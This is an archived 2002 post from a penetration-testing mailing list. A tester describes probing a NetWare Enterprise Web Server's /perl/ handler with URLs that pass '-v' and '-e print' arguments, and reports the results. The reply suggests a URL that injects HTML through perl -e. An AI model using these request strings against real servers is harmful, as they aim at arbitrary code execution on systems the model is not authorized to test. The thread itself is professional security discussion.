From: Bob Mahan (bmahan@nsoco.com)
Date: Wed Dec 18 2002 - 18:37:37 EST
How about send it some HTML? Something like:
http://address/perl/-e%20print%20><body>hello%20world</body></html>
You might have to change the tags and/or add a "Content-type: text/html"
Bob Mahan
> -----Original Message-----
----------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7
: Sat Apr 12 2008 - 10:53:26 EDT
Network Security Operations
Phone: (847) 571-5525
mailto:bmahan@nsoco.com
http://www.nsoco.com
> From: Ralph Los [mailto:RLos@enteredge.com]
> Sent: Wednesday, December 18, 2002 2:29 PM
> To: Pen-test@securityfocus.com
> Subject: Re-opening an old thread:
> NetWare-Enterprise-Web-Server/5.1 --As sistence requested.
> Sensitivity: Confidential
>
>
> Hey - let me re-open a thread again, if you folks don't mind.
> I've found a server at one of our pen-test clients with this
> NetWare HTTP/HTTPS server. I've been trying to figure out a
> way to make it tango, but have been having some problems.
> Here's what I've tried and where I left off, maybe someone
> can toss some suggestions out.
>
> Attempt: http://address/perl/-v
> Result: NetWare port Copyright 1998 Novell Corporation.
> All rights reserved.
>
> Attempt: http://address/perl/-h
> Result: Page not found
>
> Attempt: http://address/perl/-e%20print%20%22hello%20world%22;
> Result: IE just hangs there "DONE"
>
> Attempt: http://address/perl/-e%20print%201;
> Result: IE just hangs there "DONE"
>
> So what's up? Is this box "patched" against this form of
> attack somehow? Could someone throw me another idea maybe?
>
> Thanks a bunch.
>
>
> --------------------------------------------------------------
> --------------
> This list is provided by the SecurityFocus Security
> Intelligence Alert (SIA) Service. For more information on
> SecurityFocus' SIA service which automatically alerts you to
> the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/